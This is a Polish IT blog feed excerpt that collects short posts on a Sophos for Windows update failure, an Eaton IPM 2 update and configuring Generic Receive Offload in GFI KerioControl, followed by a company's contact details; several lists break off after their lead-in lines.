Uwaga: Do momentu ponownego uruchomienia urządzenia aktualizacje będą nadal co godzinę kończyć się niepowodzeniem.
Artykuł Sophos dla Windows: aktualizacje Sophos mogą nie powieść się z powodu użycia wycofanego mechanizmu aktualizacji pochodzi z serwisu FirewallBlog - BLOG IT.
Z początkiem 2024 roku firma Eaton wprowadziła aktualizację do IPM 2, poniżej przedstawiamy nowe funkcje oraz zmiany jakie nastąpiły:
Artykuł Aktualizacja 2.7.2 do IPM2 już dostępna pochodzi z serwisu FirewallBlog - BLOG IT.
Generic Receive Offload (GRO) to technologia agregacji pakietów sieciowych, zaprojektowana w celu redukcji użycia CPU podczas przetwarzania ruchu sieciowego. Łączy przychodzące pakiety z tego samego strumienia w większy, pojedynczy pakiet. Ten proces zmniejsza nadmiarowe obciążenie związane z przetwarzaniem każdego pakietu indywidualnie, co prowadzi do poprawy przepustowości i redukcji obciążenia CPU. GFI KerioControl 9.4.3 Patch 2 posiada możliwość zmiany tego parametru wprost w interfejsie administracyjnym.
Środowiska, w których włączenie GRO jest korzystneGRO jest szczególnie korzystne w środowiskach o dużej przepustowości, gdzie serwer jest narażony na znaczny przychodzący ruch sieciowy. Są to m.in.:
W pewnych scenariuszach GRO może nie być optymalny:
Aby zmodyfikować ustawienia GRO dla każdego interfejsu w KerioControl, wykonaj następujące kroki:
Dostosowanie ustawień GRO w GFI KerioControl może znacząco wpłynąć na wydajność sieci. Ważne jest zrozumienie środowiska sieciowego i jego wymagań przed włączeniem lub wyłączeniem tej funkcji. Regularne monitorowanie po wprowadzeniu zmian zapewnia optymalną pracę sieci z nowymi ustawieniami.
Artykuł GFI KerioControl 9.4.3 Patch 2 – zarządzanie GRO w interfejsie administracyjnym pochodzi z serwisu FirewallBlog - BLOG IT.
Sun Capital Sp. z o.o.
ul. Ołtaszyńska 92c/6
53-034 Wrocław
tel. +48 71 707-03-76
tel. +48 71 360-81-00